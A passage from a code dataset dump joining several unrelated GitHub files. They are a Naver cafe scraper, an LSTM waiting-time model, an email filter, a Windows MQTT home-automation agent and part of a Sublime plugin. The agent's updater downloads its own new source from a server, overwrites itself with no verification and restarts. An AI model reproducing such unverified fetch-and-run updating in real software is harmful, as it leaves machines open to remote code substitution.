article_item_tag1.get_attribute('href')\n article_item_tag_title = article_item_tag1.find_element_by_class_name('tit')\n title_text = article_item_tag_title.text\n user_area = article_item_tag1.find_element_by_class_name('user_area')\n nick_text = user_area.find_element_by_class_name('nick').text\n time_text = user_area.find_element_by_class_name('time').text\n no_text = user_area.find_element_by_class_name('no').text\n\n article_item_tag2 = tag_list[-1] # 댓글 카운\n reply_num_text = article_item_tag2.find_element_by_class_name('num').text # 댓글\n\n date_list = pd.date_range(startdate, enddate)\n target_date_list = [target_date.strftime('%y.%m.%d') for target_date in date_list]\n if time_text[:-1] in target_date_list:\n article_urls.append(href_url)\n logger.info(\"=======\" * 10)\n logger.info(title_text)\n logger.info(href_url)\n logger.info(\"%s %s %s reply: %s\" % (nick_text, time_text, no_text, reply_num_text))\n\n logger.info(\"=======\" * 10)\n logger.info(\"article_urls num: %d\" % len(article_urls))\n\n return article_urls\n\n\ndef scraping_article_content(driver, article_urls, startdate, enddate):\n res_list = list()\n for article_url in article_urls:\n article_id = article_url[67:72]\n # article_url = 'https://m.cafe.naver.com/ca-fe/web/cafes/29798500/articles/%s?fromList=true&menuId=29' % article_id\n driver.get(article_url)\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n # 게시글에서 제목 추출\n title = soup.select('h2.tit')[0].get_text()\n while title == 'undefined\\n ':\n driver.get(article_url)\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n # 게시글에서 제목 추출\n title = soup.select('h2.tit')[0].get_text()\n time.sleep(0.5)\n\n author = soup.find_all('a', {\"class\": \"nick\"})[1].text\n view_num = soup.find('span', {'class': 'no font_l'}).text\n view_num = view_num[3:].replace(',', '')\n view_num = int(view_num)\n\n # 내용을 하나의 텍스트로 만든다. (띄어쓰기 단위)\n content = soup.select('#postContent')[0].text\n content = content.replace('\\xa0', '\\n')\n content = content.replace('투표는 표시되지 않습니다', '')\n # dict 형태로만들어 결과 list 에 저장\n res_list.append({'title': title, 'author': author, 'view_num': view_num, 'content': content})\n logger.info(\"%s: %s, %s\" %(article_id, author, title.replace('\\n', '')))\n # time.sleep(1)\n\n startdate = startdate.strftime(\"%Y%m%d\")\n enddate = enddate.strftime(\"%Y%m%d\")\n df = pd.DataFrame(res_list)\n if startdate == enddate:\n df.to_csv('result_%s.csv' % enddate, sep='\\t', index=False)\n else:\n df.to_csv('result_%s_%s.csv' % (startdate, enddate), sep='\\t', index=False)\n\n\ndef main():\n import argparse\n\n strdate = now_dt.strftime(\"%Y%m%d\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument('startdate',\n type=lambda s: dt.datetime.strptime(s, \"%Y%m%d\").strftime(\"%Y%m%d\"),\n default=strdate,\n help=\"Start Date\",\n nargs='?'\n )\n parser.add_argument('enddate',\n type=lambda s: dt.datetime.strptime(s, \"%Y%m%d\").strftime(\"%Y%m%d\"),\n default='19000101',\n help=\"End Date\",\n nargs='?'\n )\n parser.add_argument('max_page_num',\n type=int,\n default=100,\n help=\"Max board page num\",\n nargs='?'\n )\n\n parser.add_argument(\"--auto\", help=\"auto naver login\", action=\"store_true\")\n\n args = parser.parse_args()\n\n if args.enddate > strdate:\n logger.warning(\"End Date over Today\")\n return\n elif args.startdate > strdate:\n logger.warning(\"Start Date over Today\")\n return\n elif args.enddate < args.startdate and args.enddate != '19000101':\n logger.warning(\"Start Date over End Date\")\n return\n if args.enddate == '19000101' and args.startdate <= strdate:\n args.enddate = args.startdate\n\n logger.info(\"Start Date: %s\" % args.startdate)\n logger.info(\"End Date: %s\" % args.enddate)\n logger.info(\"Max Page Num: %d\" % args.max_page_num)\n startdate = dt.datetime.strptime(args.startdate, \"%Y%m%d\")\n enddate = dt.datetime.strptime(args.enddate, \"%Y%m%d\")\n\n if not args.auto:\n naver_id = input('naver id: ')\n naver_pw = getpass.getpass('Enter pw:')\n else:\n with open(\".config\", \"r\") as f:\n auto_config = json.load(f)\n naver_id = auto_config['id']\n naver_pw = auto_config['pw']\n\n driver = selenium_naver_login(naver_id, naver_pw)\n article_urls = scraping_board_list(driver, startdate, enddate, args.max_page_num)\n scraping_article_content(driver, article_urls, startdate, enddate)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"QuantTraderEd/ficc_report_scrapping","sub_path":"scraping_main_old.py","file_name":"scraping_main_old.py","file_ext":"py","file_size_in_byte":8736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20080119638","text":"import pandas as pd\nimport nltk\nimport numpy as np\nimport tensorflow.keras as keras\nfrom sklearn import preprocessing, model_selection\nimport matplotlib.pyplot as plt\n\n\ndef get_xy():\n # cafe = pd.read_csv('data/cafe.csv', index_col=0)\n # print(cafe) # [500 rows x 13 columns]\n # print(cafe.values.shape) # (500, 13)\n\n\n # values = [cafe['아메리카노 수'], cafe['핫커피 수'], cafe['아이스커피 수'], cafe['핫음료 수'],\n # cafe['아이스음료 수'], cafe['블랜딩음료 수'], cafe['티 수'], cafe['펄 수'], cafe['총 잔 수'],\n # cafe['근무자 수'], cafe['밀린 주문 수'], cafe['대기시간 (+밀린 주문 수)']]\n cafe = pd.read_csv('data/cafe.csv')\n cafe = cafe.iloc[:, [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13]]\n print(cafe)\n\n values = np.transpose(cafe.values)\n print(values.shape) # (500, 12)\n\n scaler = preprocessing.MinMaxScaler() # 최소, 최대 범위를 0~1로\n values = scaler.fit_transform(cafe.values)\n\n grams = nltk.ngrams(values, 5+1)\n grams = np.float32(list(grams)) # 튜플의 리스트라 원하는 연산을 못함. 넘파이로 바꿔줌\n\n x = np.float32([g[:-1] for g in grams])\n # print(x.shape) # (493, 7, 13)\n y = np.float32([g[-1, -1:] for g in grams])\n # print(y.shape) # (493, 1)\n\n return x, y, scaler.data_min_[-1], scaler.data_max_[-1]\n\n\ndef model_cafe():\n x, y, data_min, data_max = get_xy() # 최대 최소값을 이용, 계산해 원래의 값으로 복구시킨다\n\n data = model_selection.train_test_split(x, y, train_size=0.8, shuffle=False)\n x_train, x_test, y_train, y_test = data\n\n model = keras.Sequential()\n model.add(keras.layers.InputLayer(input_shape=x.shape[1:]))\n model.add(keras.layers.LSTM(32, return_sequences=True, activation=\"ReLU\"))\n model.add(keras.layers.LSTM(16, return_sequences=True, activation=\"ReLU\"))\n model.add(keras.layers.LSTM(8, return_sequences=False, activation=\"ReLU\"))\n model.add(keras.layers.Dense(1))\n model.summary()\n\n model.compile(optimizer=keras.optimizers.Adam(0.01),\n loss=keras.losses.mse,\n metrics='mse')\n\n model.fit(x_train, y_train, epochs=100, verbose=2, batch_size=32)\n model.evaluate(x_test, y_test, verbose=2)\n print(model.evaluate(x_test, y_test, verbose=0))\n\n t = [[[1, 0, 0, 0, 0, 0, 1, 0, 2, 2, 1, 6.1],\n [0, 0, 0, 2, 1, 2, 0, 0, 5, 2, 1, 11.6],\n [0, 1, 0, 0, 1, 0, 0, 0, 2, 2, 2, 14.5],\n [0, 0, 0, 0, 0, 0, 3, 0, 3, 2, 2, 15.1],\n [2, 0, 1, 0, 0, 0, 0, 0, 3, 2, 3, 19.3]],\n [[1, 0, 0, 0, 0, 0, 1, 0, 2, 2, 1, 6.1],\n [0, 0, 0, 2, 1, 2, 0, 0, 5, 2, 1, 11.6],\n [0, 1, 0, 0, 1, 0, 0, 0, 2, 2, 2, 14.5],\n [0, 0, 0, 0, 0, 0, 3, 0, 3, 2, 2, 15.1],\n [2, 0, 1, 0, 0, 0, 0, 0, 3, 2, 3, 19.3]]]\n\n # line3-7\n p = model.predict(t)\n p = (data_max - data_min) * p + data_min\n print(p)\n\n exit()\n\n plt.subplot(1, 2, 1)\n plt.plot(y_test, 'r', label='target')\n plt.plot(p, 'g', label='prediction')\n plt.legend()\n\n p = (data_max - data_min) * p + data_min\n y_test = (data_max - data_min) * y_test + data_min\n\n plt.subplot(1, 2, 2)\n plt.plot(y_test, 'r')\n plt.plot(p, 'g')\n plt.show()\n\n\nmodel_cafe()\n\n\n\n","repo_name":"hmson18/cafe_WatingTime","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24636274926","text":"log = {}\nwhile True:\n name = input()\n if name == 'stop':\n break\n mail = input()\n x = mail[-2:].lower()\n if not x == 'us' and not x == 'uk':\n log[name] = mail\n[print(f'{i} -> {j}') for i, j in log.items()]\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Fundamentals/Dictionary/Old_Exercises/Fix_Emails.py","file_name":"Fix_Emails.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"38685136114","text":"from __future__ import print_function\r\n\r\nimport os, sys\r\n\r\nfrom win32con import *\r\nfrom win32gui import *\r\n\r\nimport win32service\r\nimport win32serviceutil\r\nimport servicemanager\r\nimport win32event\r\nimport win32service\r\n\r\nimport subprocess\r\n\r\nimport time\r\nimport json\r\nimport win32con\r\nimport win32com.client\r\nimport win32com.server.policy\r\nimport win32api\r\nimport win32ts\r\nimport win32process\r\nimport win32security\r\nimport win32profile\r\nimport wmi\r\nimport win32pdh\r\n\r\nimport random\r\n\r\nimport uuid\r\nimport re\r\nimport subprocess\r\n\r\nimport urllib.request\r\nfrom shutil import copyfile\r\nimport pythoncom\r\nimport logging\r\nimport sys\r\nimport ctypes\r\nimport asyncio\r\nimport keyboard\r\nimport datetime\r\nimport gmqtt\r\nimport socket\r\nfrom gmqtt import Client as MQTTClient\r\n\r\nSofaAgentVersion = 101018025\r\n\r\n\r\n## from Sens.h\r\nSENSGUID_PUBLISHER = \"{5fee1bd6-5b9b-11d1-8dd2-00aa004abd5e}\"\r\nSENSGUID_EVENTCLASS_LOGON = \"{d5978630-5b9f-11d1-8dd2-00aa004abd5e}\"\r\n\r\n## from EventSys.h\r\nPROGID_EventSystem = \"EventSystem.EventSystem\"\r\nPROGID_EventSubscription = \"EventSystem.EventSubscription\"\r\n\r\nIID_ISensLogon = \"{d597bab3-5b9f-11d1-8dd2-00aa004abd5e}\"\r\n\r\nclass SensLogon(win32com.server.policy.DesignatedWrapPolicy):\r\n _com_interfaces_=[IID_ISensLogon]\r\n _public_methods_=[\r\n 'Logon',\r\n 'Logoff',\r\n 'StartShell',\r\n 'DisplayLock',\r\n 'DisplayUnlock',\r\n 'StartScreenSaver',\r\n 'StopScreenSaver'\r\n ]\r\n\r\n def __init__(self, app):\r\n self.app=app\r\n self._wrap_(self)\r\n\r\n def Logon(self, *args):\r\n self.app.log.info('.. Log on event')\r\n asyncio.ensure_future(self.app.updateState('lockState','UNLOCKED'))\r\n\r\n def Logoff(self, *args):\r\n self.app.log.info('.. Log off event')\r\n asyncio.ensure_future(self.app.updateState('lockState','LOCKED'))\r\n\r\n def StartShell(self, *args):\r\n self.app.log.info('.. Start Shell event')\r\n\r\n def DisplayLock(self, *args):\r\n self.app.log.info('.. Display Lock event')\r\n asyncio.ensure_future(self.app.updateState('lockState','LOCKED'))\r\n\r\n def DisplayUnlock(self, *args):\r\n self.app.log.info('.. Display unlock event')\r\n asyncio.ensure_future(self.app.updateState('lockState','UNLOCKED'))\r\n\r\n def StartScreenSaver(self, *args):\r\n self.app.log.info('.. Start Screensaver event')\r\n\r\n def StopScreenSaver(self, *args):\r\n self.app.log.info('.. Stop Screensaver event')\r\n\r\nclass gmqttClient():\r\n\r\n def __init__(self, app):\r\n self.app=app\r\n #self.endpointId=self.app.devicePath.replace('/',':')\r\n self.deviceId=self.app.deviceId\r\n self.connected=False\r\n self.log = logging.getLogger('sofamqtt')\r\n self.log.info('.. MQTT Module initialized')\r\n self.topic='sofa/pc'\r\n self.broker='mqtt://home.dayton.home'\r\n self.broker='home.dayton.home'\r\n self.connected=False\r\n\r\n async def start(self):\r\n self.client = MQTTClient(self.deviceId)\r\n self.client.on_message = self.on_message\r\n self.client.on_connect = self.on_connect\r\n #self.client.set_auth_credentials(token, None)\r\n await self.client.connect(self.broker, 1883, version=gmqtt.constants.MQTTv311)\r\n \r\n def on_connect(self, client, flags, rc, properties):\r\n self.connected=True\r\n client.subscribe(self.topic, qos=0)\r\n self.sendState()\r\n\r\n def sendCommand(self,command):\r\n try:\r\n self.log.info('Sending command: %s' % command)\r\n self.client.publish(self.topic, json.dumps({'op':'command', 'device':self.app.deviceId, 'command':command }))\r\n except:\r\n self.log.error('Error sending command', exc_info=True)\r\n\r\n\r\n def sendState(self):\r\n try:\r\n self.client.publish(self.topic, json.dumps({'op':'state', 'device':self.app.deviceId, 'state': self.app.state }))\r\n except:\r\n self.log.error('Error sending state info', exc_info=True)\r\n\r\n def on_message(self, client, topic, payload, qos, properties):\r\n self.log.info('<< %s' % payload.decode())\r\n try:\r\n event=json.loads(payload)\r\n except:\r\n self.log.info('Message received but not JSON: %s' % payload)\r\n return False\r\n \r\n try:\r\n if 'op' in event:\r\n print('OP: %s' % event['op'])\r\n if event['op']=='discover':\r\n self.sendState()\r\n \r\n elif event['op']=='set':\r\n if event['device']==self.deviceId:\r\n asyncio.ensure_future(self.app.setState(event['property'], event['value']))\r\n\r\n except:\r\n self.log.error('Error handling message event: %s' % event, exc_info=True)\r\n\r\n\r\n async def notify(self, message, topic='pc'):\r\n\r\n try:\r\n if self.connected:\r\n self.log.info(\">> mqtt/%s %s\" % (self.topic, message))\r\n self.client.publish(self.topic, message)\r\n else:\r\n self.log.info('Notify called before connect')\r\n\r\n except:\r\n self.log.error('Error publishing message', exc_info=True)\r\n\r\n\r\nclass syslaunch():\r\n\r\n def __init__(self, app):\r\n self.app=app\r\n self.log = logging.getLogger('sofasyslaunch')\r\n \r\n def lockPC(self):\r\n ctypes.windll.user32.LockWorkStation()\r\n \t\t \r\n def suspendPC(self):\r\n \r\n self.log.info(\"+++ Local: Suspending PC\")\r\n # Enable the SeShutdown privilege (which must be present in your\r\n # token in the first place)\r\n try:\r\n priv_flags = win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERY\r\n hToken = win32security.OpenProcessToken (win32api.GetCurrentProcess (), priv_flags)\r\n priv_id = win32security.LookupPrivilegeValue (\r\n None, \r\n win32security.SE_SHUTDOWN_NAME\r\n )\r\n old_privs = win32security.AdjustTokenPrivileges (\r\n hToken,\r\n 0,\r\n [(priv_id, win32security.SE_PRIVILEGE_ENABLED)]\r\n )\r\n # Params:\r\n # True=> Standby; False=> Hibernate\r\n # True=> Force closedown; False=> Don't force\r\n ctypes.windll.kernel32.SetSystemPowerState (True, True)\r\n \r\n except: # catch *all* exceptions\r\n e = sys.exc_info()[1]\r\n self.log.info(\"Error: %s\" % e )\r\n\r\n\r\n\r\nclass sofaPCAgent():\r\n \r\n def __init__(self, isrunning=False):\r\n\r\n self.isrunning=isrunning\r\n self.deviceId=socket.gethostname()\r\n self.filepath=\"C:\\\\Program Files\\\\SofaAgent\"\r\n self.updatePollTime=6000\r\n self.lastUpdateCheck=datetime.datetime.now()\r\n\r\n pythoncom.CoInitialize()\r\n self.loop = asyncio.get_event_loop()\r\n self.adaptername='sofapc'\r\n self.logsetup('INFO',errorOnly=['gmqtt.mqtt.protocol','gmqtt.mqtt.handler','gmqtt.mqtt.package'])\r\n\r\n self.launch=syslaunch(self)\r\n self.mqttclient = gmqttClient(self)\r\n self.notify=self.mqttclient.notify\r\n #self.sendChangeReport=self.mqttclient.sendChangeReport\r\n self.log.info('-----------------')\r\n\r\n def logsetup(self, level=\"INFO\", errorOnly=[]):\r\n \r\n loglevel=getattr(logging,level)\r\n logging.basicConfig(level=loglevel, format='%(asctime)-6s.%(msecs).03d %(levelname).1s %(lineno)4d %(threadName)-.1s: %(message)s',datefmt='%m/%d %H:%M:%S', filename='c:\\\\programdata\\\\%s.log' % self.adaptername,)\r\n self.log = logging.getLogger(self.adaptername)\r\n \r\n formatter = logging.Formatter('%(asctime)-6s.%(msecs).03d %(levelname).1s %(lineno)4d %(threadName)-.1s: %(message)s',datefmt='%m/%d %H:%M:%S')\r\n console = logging.StreamHandler()\r\n console.setFormatter(formatter)\r\n console.setLevel(logging.INFO)\r\n\r\n self.log.info('-- -----------------------------------------------')\r\n\r\n logging.getLogger(self.adaptername).addHandler(console)\r\n \r\n for lg in logging.Logger.manager.loggerDict:\r\n #self.log.info('.. Active logger: %s' % lg)\r\n for item in errorOnly:\r\n if lg.startswith(item):\r\n self.log.info('.. Logger set to error and above: %s' % lg)\r\n logging.getLogger(lg).setLevel(logging.ERROR)\r\n\r\n\r\n def initPowerEventMonitor(self):\r\n wc = WNDCLASS()\r\n wc.hInstance = hInst = GetModuleHandle(None)\r\n wc.lpszClassName = \"PowerMonitor\"\r\n wc.lpfnWndProc = self.WndProc\r\n self.classAtom = RegisterClass(wc)\r\n self.hWnd = CreateWindow(self.classAtom, \"Power event monitor\", 0, 0, 0, CW_USEDEFAULT, CW_USEDEFAULT, 0, 0, hInst, None)\r\n UpdateWindow(self.hWnd) \r\n\r\n def requestLockState(self): \r\n hwinsta = win32service.OpenWindowStation(\"winsta0\", False, win32con.READ_CONTROL)\r\n hwinsta.SetProcessWindowStation()\r\n try:\r\n curr_desktop=win32service.OpenInputDesktop(0,True,win32con.MAXIMUM_ALLOWED)\r\n self.log.info('Requested Lock State: Unlocked')\r\n return 'UNLOCKED'\r\n\r\n except:\r\n self.log.info('Requested Lock State: Locked',exc_info=True)\r\n return 'LOCKED'\r\n\r\n def initSensEventMonitor(self):\r\n sl=SensLogon(self)\r\n subscription_interface=pythoncom.WrapObject(sl)\r\n event_system=win32com.client.Dispatch(PROGID_EventSystem)\r\n event_subscription=win32com.client.Dispatch(PROGID_EventSubscription)\r\n event_subscription.EventClassID=SENSGUID_EVENTCLASS_LOGON\r\n event_subscription.PublisherID=SENSGUID_PUBLISHER\r\n event_subscription.SubscriptionName='Python subscription'\r\n event_subscription.SubscriberInterface=subscription_interface\r\n event_system.Store(PROGID_EventSubscription, event_subscription)\r\n\r\n def initMediaKeys(self):\r\n keyboard.add_hotkey(-177, self.rewind, suppress=True) # unmute on keydown\r\n keyboard.add_hotkey(-176, self.ffw, suppress=True) # unmute on keydown\r\n keyboard.add_hotkey(-179, self.playpause, suppress=True) # unmute on keydown\r\n\r\n def playpause(self):\r\n self.log.info('loop %s' % self.loop)\r\n cmd=json.dumps({'op':'command', 'device':self.deviceId, 'command':'play' })\r\n asyncio.run_coroutine_threadsafe(self.notify(cmd), self.loop)\r\n\r\n def ffw(self):\r\n self.log.info('loop %s' % self.loop)\r\n cmd=json.dumps({'op':'command', 'device':self.deviceId, 'command':'skip' })\r\n asyncio.run_coroutine_threadsafe(self.notify(cmd), self.loop)\r\n\r\n def rewind(self):\r\n self.log.info('loop %s' % self.loop)\r\n cmd=json.dumps({'op':'command', 'device':self.deviceId, 'command':'rewind' })\r\n asyncio.run_coroutine_threadsafe(self.notify(cmd), self.loop)\r\n\r\n async def mainloop(self):\r\n\r\n await self.forwardevent('info','powermonitor Main Loop started. Waiting for events.')\r\n while self.isrunning:\r\n pythoncom.PumpWaitingMessages()\r\n PumpWaitingMessages()\r\n await asyncio.sleep(.1)\r\n delta = datetime.datetime.now()-self.lastUpdateCheck\r\n if delta.seconds>self.updatePollTime:\r\n self.checkForUpdates()\r\n\r\n \r\n def checkForUpdates(self):\r\n try:\r\n self.log.info('Current Agent Version: %s' % SofaAgentVersion)\r\n except:\r\n self.log.error('Error showing version', exc_info=True)\r\n return False\r\n\r\n try:\r\n self.lastUpdateCheck=datetime.datetime.now()\r\n url = 'https://home.dayton.home/var/pc/agentversion'\r\n data = urllib.request.urlopen(url)\r\n versioninfo=data.read()\r\n serverversion=versioninfo.decode()\r\n self.log.info('Server Agent Version: %s' % serverversion)\r\n \r\n if str(SofaAgentVersion) != str(serverversion):\r\n try:\r\n self.log.info('Downloading version %s' % serverversion)\r\n url = 'https://home.dayton.home/var/pc/agent'\r\n urllib.request.urlretrieve(url, \"%s\\sofaagent.py.new\" % self.filepath)\r\n self.log.info('New version %s available as %s' % (serverversion,\"%s\\sofaagent.py.new\" % self.filepath))\r\n copyfile(\"%s\\sofaagent.py\" % self.filepath, \"%s\\sofaagent.py.old\" % self.filepath)\r\n copyfile(\"%s\\sofaagent.py.new\" % self.filepath, \"%s\\sofaagent.py\" % self.filepath)\r\n \r\n # attempt to restart service\r\n DETACHED_PROCESS = 0x00000008\r\n results = subprocess.Popen(['%s\\sofa-restart.bat' % self.filepath], close_fds=True, creationflags=DETACHED_PROCESS)\r\n\r\n except:\r\n self.log.error('Error updating to current version %s' % serverversion, exc_info=True)\r\n \r\n except:\r\n self.log.error('Error with Check for Update', exc_info=True)\r\n \r\n\r\n async def updateState(self, prop, value, sendChangeReport=True):\r\n \r\n try:\r\n self.log.info('updateState: %s %s' % (prop, value))\r\n self.log.info('curState: %s %s' % (sendChangeReport, self.state[prop]))\r\n if self.state[prop]!=value:\r\n self.state[prop]=value\r\n if sendChangeReport:\r\n minichange={'op':'change', 'device':self.deviceId, 'property':prop, 'value':value}\r\n self.log.info('sending change report: %s ' % minichange)\r\n await self.notify(json.dumps(minichange))\r\n except:\r\n self.log.error('Error updating state: %s %s' % (prop, value), exc_info=True)\r\n \r\n async def setState(self, prop, value):\r\n \r\n if prop=='powerState':\r\n if value==\"OFF\":\r\n await self.updateState('lockState','LOCKED')\r\n await self.updateState('powerState','OFF')\r\n time.sleep(.5)\r\n self.launch.suspendPC()\r\n \r\n elif prop=='lockState':\r\n if value==\"UNLOCKED\":\r\n self.log.info('PC Unlock not implemented yet')\r\n elif value==\"LOCKED\":\r\n await self.updateState('lockState','LOCKED')\r\n self.launch.lockPC()\r\n \r\n\r\n def start(self):\r\n self.checkForUpdates()\r\n self.initPowerEventMonitor()\r\n self.initSensEventMonitor()\r\n self.initMediaKeys()\r\n self.state={ 'powerState' : 'ON', 'lockState' : self.requestLockState() }\r\n asyncio.set_event_loop(self.loop)\r\n self.loop.run_until_complete(self.mqttclient.start())\r\n self.loop.run_until_complete(self.mainloop())\t\r\n\r\n async def forwardevent(self, eventType, event, data=''):\r\n self.log.info(\"%s - %s %s %s\" % (str(datetime.datetime.now()), eventType, event, data))\r\n\r\n def stop(self):\r\n self.log.info('Sofa Agent Service is being stopped')\r\n self.loop.stop()\r\n self.loop.close()\r\n PostQuitMessage(0)\r\n\r\n def WndProc(self, hWnd, message, wParam, lParam):\r\n if message == WM_POWERBROADCAST:\r\n if wParam == PBT_APMSUSPEND:\r\n self.OnSuspend(hWnd, message, wParam, lParam)\r\n elif wParam == PBT_APMRESUMESUSPEND:\r\n self.OnResume(hWnd, message, wParam, lParam)\r\n elif wParam == PBT_APMRESUMEAUTOMATIC:\r\n self.OnAutoResume(hWnd, message, wParam, lParam)\r\n else:\r\n self.log.info(\"WMPB:\"+str(wParam))\r\n\r\n elif message == WM_TIMECHANGE:\r\n asyncio.ensure_future(self.forwardevent(\"state\",\"System Time Change Detected\"))\r\n elif message == WM_SETTINGCHANGE:\r\n asyncio.ensure_future(self.forwardevent(\"state\",\"Setting Change\",str(wParam)+\" \"+str(lParam)))\r\n elif message == WM_DEVICECHANGE:\r\n asyncio.ensure_future(self.forwardevent(\"state\",\"Device Change\",str(wParam)+\" \"+str(lParam)))\r\n elif message == WM_CLOSE:\r\n asyncio.ensure_future(self.forwardevent(\"state\",\"WM_CLOSE\"))\r\n DestroyWindow(hWnd)\r\n elif message == WM_DESTROY:\r\n asyncio.ensure_future(self.forwardevent(\"state\",\"WM_DESTROY\"))\r\n PostQuitMessage(0)\r\n elif message == WM_QUERYENDSESSION:\r\n asyncio.ensure_future(self.forwardevent(\"APM.WM_QUERYENDSESSION\"))\r\n return True\r\n else:\r\n logging.info(\"APM.unknown: \"+str(message))\r\n\t\t\t\r\n def OnSuspend(self, hWnd, message, wParam, lParam):\r\n try:\r\n asyncio.ensure_future(self.updateState('lockState','LOCKED'))\r\n asyncio.ensure_future(self.updateState('powerState','OFF'))\r\n time.sleep(.5)\r\n except:\r\n self.log.error('Error handling suspend action', exc_info=Treu)\r\n\r\n def OnResume(self, hWnd, message, wParam, lParam):\r\n try:\r\n asyncio.ensure_future(self.forwardevent(\"state\",\"resume\"))\r\n asyncio.ensure_future(self.updateState('lockState','LOCKED'))\r\n asyncio.ensure_future(self.updateState('powerState','ON'))\r\n except:\r\n self.log.error('Error handling resume action', exc_info=Treu)\r\n\r\n def OnAutoResume(self, hWnd, message, wParam, lParam):\r\n try:\r\n asyncio.ensure_future(self.forwardevent(\"state\",\"autoresume\"))\r\n asyncio.ensure_future(self.updateState('lockState','LOCKED'))\r\n asyncio.ensure_future(self.updateState('powerState','ON'))\r\n except:\r\n self.log.error('Error handling autoresume action', exc_info=Treu)\r\n\r\nclass SMWinservice(win32serviceutil.ServiceFramework):\r\n '''Base class to create winservice in Python'''\r\n\r\n _svc_name_ = 'pythonService'\r\n _svc_display_name_ = 'Python Service'\r\n _svc_description_ = 'Python Service Description'\r\n\r\n @classmethod\r\n def parse_command_line(cls):\r\n '''\r\n ClassMethod to parse the command line\r\n '''\r\n win32serviceutil.HandleCommandLine(cls)\r\n\r\n def __init__(self, args):\r\n '''\r\n Constructor of the winservice\r\n '''\r\n win32serviceutil.ServiceFramework.__init__(self, args)\r\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\r\n socket.setdefaulttimeout(60)\r\n\r\n def SvcStop(self):\r\n '''\r\n Called when the service is asked to stop\r\n '''\r\n self.stop()\r\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\r\n win32event.SetEvent(self.hWaitStop)\r\n\r\n def SvcDoRun(self):\r\n '''\r\n Called when the service is asked to start\r\n '''\r\n self.start()\r\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\r\n servicemanager.PYS_SERVICE_STARTED,\r\n (self._svc_name_, ''))\r\n self.main()\r\n\r\n def start(self):\r\n '''\r\n Override to add logic before the start\r\n eg. running condition\r\n '''\r\n pass\r\n\r\n def stop(self):\r\n '''\r\n Override to add logic before the stop\r\n eg. invalidating running condition\r\n '''\r\n pass\r\n\r\n def main(self):\r\n '''\r\n Main class to be ovverridden to add logic\r\n '''\r\n pass\r\n\r\nclass sofaAgentService(SMWinservice):\r\n\r\n _svc_name_ = \"SofaAgent\"\r\n _svc_display_name_ = \"Sofa Control Agent\"\r\n _svc_description_ = \"Sofa MQTT control agent\"\r\n\r\n def stop(self):\r\n self.isrunning = False\r\n self.agent.stop()\r\n\r\n def start(self):\r\n self.isrunning = True\r\n\r\n def main(self):\r\n self.agent=sofaPCAgent(self.isrunning)\r\n self.agent.start()\r\n\r\n# entry point of the module: copy and paste into the new module\r\n# ensuring you are calling the \"parse_command_line\" of the new created class\r\nif __name__ == '__main__':\r\n #isrunning=True\r\n #agent=sofaPCAgent(isrunning)\r\n #agent.start()\r\n\r\n print(sys.argv)\r\n sofaAgentService.parse_command_line()\r\n\r\n","repo_name":"tagdara/sofa-adapter-pc","sub_path":"old/sofaagent.py","file_name":"sofaagent.py","file_ext":"py","file_size_in_byte":20122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71731783849","text":"from sublime import Region\nfrom sublime import version\n\nfrom NeoVintageous.nv.jumplist import jumplist_update\nfrom NeoVintageous.nv.ui import ui_bell\nfrom NeoVintageous.nv.utils import next_non_blank\nfrom NeoVintageous.nv.utils import regions_transform_to_normal_mode\nfrom NeoVintageous.nv.utils import regions_transformer\nfrom NeoVintageous.nv.utils import resolve_visual_line_target\nfrom NeoVintageous.nv.utils import resolve_visual_target\nfrom NeoVintageous.nv.utils import set_selection\nfrom NeoVintageous.nv.utils import show_if_not_visible\nfrom NeoVintageous.nv.utils import wrapscan\nfrom NeoVintageous.nv.vi.text_objects import find_next_lone_bracket\nfrom NeoVintageous.nv.vi.text_objects import find_prev_lone_bracket\nfrom NeoVintageous.nv.vim import EOF\nfrom NeoVintageous.nv.vim import INTERNAL_NORMAL\nfrom NeoVintageous.nv.vim import NORMAL\nfrom NeoVintageous.nv.vim import VISUAL\nfrom NeoVintageous.nv.vim import VISUAL_LINE\nfrom NeoVintageous.nv.vim import enter_normal_mode\nfrom NeoVintageous.nv.vim import status_message\n\n\ndef goto_help(window) -> None:\n view = window.active_view()\n if not view:\n raise ValueError('view is required')\n\n if not view.sel():\n raise ValueError('selection is required')\n\n sel = view.sel()[0]\n\n score = view.score_selector(sel.b, 'text.neovintageous jumptag')\n\n # TODO goto to help for any word in a help file. See :h bar Anyway, you can\n # use CTRL-] on any word, also when it is not within |, and Vim will try to\n # find help for it. Especially for options in single quotes, e.g.\n # 'compatible'.\n\n if score == 0:\n return\n\n subject = view.substr(view.extract_scope(sel.b))\n if not subject:\n return\n\n if len(subject) > 50:\n return status_message('E149: Sorry, no help found')\n\n # TODO Refactor ex cmd internets to this common utility\n from NeoVintageous.nv.ex_cmds import do_ex_command\n do_ex_command(window, 'help', {'subject': subject})\n\n\ndef goto_line(view, mode: str, line_number: int) -> None:\n line_number = line_number if line_number > 0 else 1\n dest = view.text_point(line_number - 1, 0)\n\n def f(view, s):\n if mode == NORMAL:\n pt = next_non_blank(view, dest)\n if view.substr(pt) == EOF:\n pt = max(pt - 1, 0)\n\n return Region(pt)\n elif mode == INTERNAL_NORMAL:\n start_line = view.full_line(s.a)\n dest_line = view.full_line(dest)\n if start_line.a == dest_line.a:\n return dest_line\n elif start_line.a < dest_line.a:\n return Region(start_line.a, dest_line.b)\n else:\n return Region(start_line.b, dest_line.a)\n elif mode == VISUAL:\n dest_non_blank = next_non_blank(view, dest)\n if dest_non_blank < s.a and s.a < s.b:\n return Region(s.a + 1, 